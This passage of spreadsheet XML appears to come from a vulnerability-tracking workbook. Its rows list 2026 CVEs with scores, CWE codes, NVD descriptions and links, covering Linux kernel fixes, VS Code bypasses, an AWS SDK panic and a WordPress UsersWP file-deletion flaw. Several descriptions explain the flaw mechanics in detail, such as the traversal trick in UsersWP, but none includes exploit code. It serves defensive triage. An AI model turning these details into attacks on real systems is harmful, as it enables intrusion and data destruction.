      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: carry oversized SMC-Rv2 LLC messages in the queue entry
smc_llc_rmt_delete_rkey() and smc_llc_save_add_link_rkeys() read the part
of a v2 message that does not fit into the 44-byte union smc_llc_msg, and
both bound themselves by the size of the buffer it landed in, not by what
arrived. On a link with a shared v2 receive buffer a 44-byte
DELETE_RKEY_V2 declaring 255 rkeys reaches rkey[9..254] in whatever an
earlier message left in lgr-&gt;wr_rx_buf_v2, and passes each of them to
smc_rtoken_delete(). One of those 255 matched a registered rtoken and
deleted it. An ADD_LINK on such a link installs up to 255 rtokens from
the same bytes.
Copy the tail into the queue entry, so its length is the length of the
message that arrived, and declare the rkeys that fit inline as a member of
the union instead of reaching them through a cast. The same
DELETE_RKEY_V2 now processes the 9 rkeys it carries. The copy is limited
to the longest tail the two functions can read, so the peer does not pick
the size of the entry.
The bound the previous patch placed on links without a shared v2 receive
buffer is no longer needed.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80985</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81357</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89090</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>An unrecovered panic in the event stream header decoder in Amazon AWS SDK for Go v2 before release-2026-03-23 might allow an unauthenticated remote actor to terminate the consuming application process via a crafted event stream response frame containing a header value type outside the valid range.
To remediate this issue, users should upgrade to release-2026-03-23 or later, and patch any forked or derivative code.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89090</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89554</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix uninitialized local_id in syncookie MP_JOIN reconstruction
mptcp_token_join_cookie_init_state() restores remote_nonce, local_nonce,
backup, join_id, token and msk from the saved cookie entry when rebuilding
the request socket for a MP_JOIN 4th-ACK handled under SYN cookies, but it
does not restore local_id, even though the SYN path saved it.
subflow_ulp_clone() then reads that uninitialized field and stores it as
the joined subflow's address-ID. Because the request-sock slab is
SLAB_TYPESAFE_BY_RCU and not zeroed on allocation, the value is the stale
byte of a previously freed request socket, which an off-path peer can
influence by sending concurrent MP_JOIN SYNs. This corrupts the path
manager's id-based subflow bookkeeping for the connection.
Restore subflow_req-&gt;local_id from the cookie entry, as done for the other
fields.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89554</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89586</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ata: libata-scsi: fix DSM TRIM for sector sizes larger than 2048 bytes
ata_scsi_write_same_xlat() translates a SCSI WRITE SAME command with the
UNMAP bit set into an ATA DATA SET MANAGEMENT TRIM command.  The TRIM
descriptor is built by ata_format_dsm_trim_descr() into the 2048-byte
ata_scsi_rbuf staging buffer, and the number of bytes copied is compared
against the logical sector size by the caller:
	size = ata_format_dsm_trim_descr(scmd, trmax, block, n_block);
	if (size != len)		/* len == sdp-&gt;sector_size */
		goto invalid_param_len;
ata_format_dsm_trim_descr() clamps the copy length to ATA_SCSI_RBUF_SIZE
(2048).  On a device whose logical sector size exceeds that (e.g. a 4Kn
device, where sector_size == 4096) the function can never return more than
2048, while the caller expects it to return sector_size.  The comparison
therefore always fails, so every TRIM is rejected with "Parameter list
length error" and WARN_ON() splats on each attempt.  TRIM / discard is
thus completely broken on such devices.
The descriptor was incorrectly sized from the logical sector size.  A DSM
TRIM payload is a list of 512-byte pages, each holding up to
ATA_MAX_TRIM_RNUM (64) LBA Range Entries, and is independent of the logical
sector size.  The Block Limits VPD page already advertises a single such
page as the maximum WRITE SAME length (65535 * ATA_MAX_TRIM_RNUM logical
blocks), so the block layer never sends a request that needs more than one
page.
Emit exactly one 512-byte page, independent of the logical sector size,
and transfer only that page (COUNT == 1).  For a 512-byte-sector device
this is unchanged; devices with larger logical sectors now work instead of
failing every TRIM.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89586</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89632</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix use-before-check of ReparseDataLength in reparse_buf_ptr()
reparse_buf_ptr() reads buf-&gt;ReparseDataLength before checking that
count covers the full fixed header:
    buf = (struct reparse_data_buffer *)((u8 *)io + off);
    len = sizeof(*buf);                          /* 8 bytes */
    rdlen = le16_to_cpu(buf-&gt;ReparseDataLength); /* offset 4, 2 bytes */
    if (count &lt; len || count &lt; rdlen + len)      /* check comes after */
struct reparse_data_buffer has ReparseDataLength at offset 4.  If a
server returns OutputCount &lt; 6, the read at offset 4-5 reaches past
the end of the received data.  The off+count bounds against iov_len
were already validated, but that does not protect against count being
smaller than sizeof(*buf).
Split the check: verify count &gt;= sizeof(*buf) before reading
ReparseDataLength, then verify count covers the data region.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89632</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89665</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: reject out-of-range useconds in NFSv2 SETATTR/CREATE
The NFSv2 sattr decoder converts the wire useconds to nanoseconds in
svcxdr_decode_sattr():
	iap-&gt;ia_atime.tv_nsec = tmp2 * NSEC_PER_USEC;
tmp2 is a u32 and NSEC_PER_USEC is 1000, so the product is computed in
unsigned long. On ILP32 that is 32 bits, and an out-of-range useconds
value such as 4294968 wraps to tv_nsec == 704. The corruption therefore
happens during decode, before any proc function can inspect the value,
and a later range check on tv_nsec would see an in-range result and
accept it. Rejecting in the decoder yields an RPC GARBAGE_ARGS reply.
NFSv2 defines no NFSERR_INVAL, so there is no NFS-level status to return
for a malformed time argument, and the check cannot move to the proc
function the way the v3/v4 nsec range checks do.
Guard the raw useconds before the multiplication and reject values
greater than 1000000. useconds == 1000000 is kept: it is the Sun
convention for "set to the current server time", and the in-tree Linux
NFSv2 client emits it in both the atime and the mtime field for a plain
touch / utimes(file, NULL) (see encode_sattr() and
xdr_encode_current_server_time() in fs/nfs/nfs2xdr.c). Rejecting 1000000
would turn that common operation into a hard decode failure for both
SETATTR and CREATE. 1000000 * NSEC_PER_USEC is 10^9, which does not wrap
on ILP32, so the Sun convention value passes through safely. Only
genuinely out-of-range values (&gt; 1000000) are rejected. The atime and
mtime guards are therefore symmetric.
The decoder only applied the Sun convention in the mtime block, which
clears ATTR_ATIME_SET|ATTR_MTIME_SET when mtime useconds == 1000000. If a
client puts 1000000 in the atime field but not in the mtime field, the
atime block stored an out-of-range tv_nsec (10^9) and left ATTR_ATIME_SET
set, so the bogus value reached the filesystem. Apply the convention in
the atime block as well, clearing ATTR_ATIME_SET so the server uses its
current time and ignores the value. Only ATTR_ATIME_SET is cleared there.
The mtime block keeps its existing behavior, where 1000000 means "set
both atime and mtime to now".
[ cel: various tweaks, addenda, and clean-ups ]</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89665</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89711</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: remove flawed WARN_ON_ONCE from nfsd_mode_check
The header for commit e75b23f9e323 ("nfsd: check d_can_lookup in
fh_verify of directories") details the assumption that justified
adding the WARN_ON_ONCE to nfsd_mode_check(), that assumption is
invalid (in the case of NFS reexport).
When NFSD exports an NFS filesystem it is very possible for
nfsd_mode_check() to encounter a @dentry that doesn't have
i_op-&gt;lookup (see nfs_fhget()'s NFS_ATTR_FATTR_MOUNTPOINT and
NFS_ATTR_FATTR_V4_REFERRAL handling, and d_flags_for_inode()).
So remove nfsd_mode_check()'s WARN_ON_ONCE(). The nfserr_notdir
return on that branch must stay. It guards the subsequent
lookup_one_unlocked() -&gt; __lookup_slow() path, which calls
inode-&gt;i_op-&gt;lookup() with no NULL check, so returning nfserr_notdir
is what keeps a client LOOKUP into such a @dentry from dereferencing
a NULL method pointer.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89711</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90451</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>An example environment-configuration file ships with a fixed, publicly-known secret value used to sign authentication cookies for a bundled packet-analysis component. A deployment that copies this example file into active configuration without running the setup routine that regenerates the value will use the known default, allowing an attacker aware of the default to forge valid authentication cookies for that component.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90451</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19991</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>The UsersWP plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 1.2.70 via the upload_file_remove() AJAX handler. The plugin stores the value of an account 'file' form field taken directly from $_POST when no real $_FILES upload is provided (process_account() calls uwp_validate_fields() and array_merges the result with the empty output of UsersWP_Files::validate_uploads()). At storage time the value is only checked with validate_file(), which passes any string that does not contain a literal '../'. When the value is later processed by upload_file_remove(), it is again gated with validate_file() and then normalized through uwp_get_file_relative_url(); that helper performs a global str_replace() of the uploads base URL against the stored URL, allowing a crafted URL containing embedded '..&lt;uploads-baseurl&gt;' tokens to collapse into '../../' traversal sequences after the last validation. The transformed value is then appended to the uploads base directory and passed to wp_delete_file() without any canonical containment check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the affected site's server (including wp-config.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19991</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49464</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>NL Portal Backend Libraries provide backend components for Dutch government portals that interact with residents, customers, suppliers, and partner organizations. The `nl.nl-portal:taak` package from version 1.5.0 through 3.0.0 fails to verify ownership when processing the `submitTaakV2` GraphQL mutation, allowing an authenticated user who knows or guesses another user’s task ID to read its form data, overwrite its submitted data, and mark the task as completed. Version 3.0.1 contains a patch. As a workaround, block the `submitTaakV2` mutation at the API gateway or restrict the `/graphql` endpoint to trusted networks</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49464</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.007</v>
      </c>
